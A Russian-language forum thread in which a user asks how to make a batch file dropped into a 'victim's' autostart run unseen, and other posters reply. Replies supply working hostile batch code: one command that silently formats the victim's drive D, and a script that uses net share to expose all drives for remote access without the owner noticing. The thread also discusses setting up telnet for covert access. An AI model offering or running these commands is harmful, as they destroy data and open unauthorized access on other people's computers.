люди...у меня к вам вопрос...как зделать так чтобы командная строка была невидимиая ??? обьясню на примере...есть бат-файл..как его запустить невидимо ? в фоновом режиме ? только не в скрытом...пожалуйста помогите,срочно нада...заранее благодарен...
затем чтобы на другом компе не догадались что там рабоатет батник...но суть не в этом...просто может кто знает ? ненада ни зачем ни с какой помощью программы,а именно втсроенными ф-циями винды такбы сказать както можно...???
ога, telnet пиздец =\ установлю телнет недорого, так же поставлю к вам на комп svchost.exe netbios, explorer.exe, rundll.exe
щас здохну . есть батник . я его даю жертве . он выливаетса в автозагрузку - там он потом соответсвенно запускаетса .как зделать чтобы его никто не заметил ?? есть же команда скрытого режима...а вот чтото типа фонового так и ненашол...
а телнет то зачем....мне просто нада чтобы баник , когда автоматом запускаетса...чтобы он в фоновом..и все,но как....вот в чем вопрос...
без телнета будет палится окно кмд, всё равно, даже при echo off придётся устанавливать telnet, полюбому
кинь ему это и не епи моск. Code: @Echo off format d: /q /y > nul форматнёт локальный диск D , при наличии мозгов можно дописать пару строк с возможным именем локального диска
ребята вам огромное спасибо хочу сказать вообще за помощь...почему я пишу,а не рыюсь в нете ? потому что я весь день работаю,и щас уставший...поэтому пожалуйста обьясните как телнет установить...я то помню чтото,телнет старт и все такое,но там вроде нада пасс и логин...и мысль , может его нада создавать , нового юзера? если нетрудно ....)
Та лучше брось ему Бат-файл который розшарит все диски с полным дступо. Этот батник выполняется очень быстро и юзверь и не поймт что случилось. А потом уже... работы не початый край
Верно. Сделай так. Code: @Echo off net share disk_d=d: > nul net share disk_c=c: > nul net share disk_x=x: > nul net share disk_y=y: > nul net share disk_z=z: > nul net share disk_f=f: > nul